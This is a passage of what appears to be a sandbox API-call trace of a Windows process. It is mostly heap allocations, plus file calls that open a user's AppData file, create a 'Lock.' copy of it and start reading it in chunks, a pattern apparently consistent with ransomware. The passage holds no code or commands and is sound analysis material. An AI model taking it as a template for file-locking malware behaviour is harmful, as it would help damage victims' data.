(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0225.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0225.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0225.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0225.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0225.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0225.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0225.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0225.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0225.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0225.458] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0225.458] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0225.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0225.459] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bfVxZ90.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bfvxz90.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0225.459] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.459] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0225.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0225.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0225.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0225.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0225.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0225.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0225.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.460] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0225.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0225.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0225.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.bfVxZ90.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.bfvxz90.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0225.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0225.784] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0225.784] TranslateMessage (lpMsg=0x8cf708) returned 0 [0225.784] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0225.784] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0225.784] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0225.784] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0225.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0225.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0225.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0225.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0225.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0225.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0225.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0225.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe59020 [0225.788] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0225.788] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, 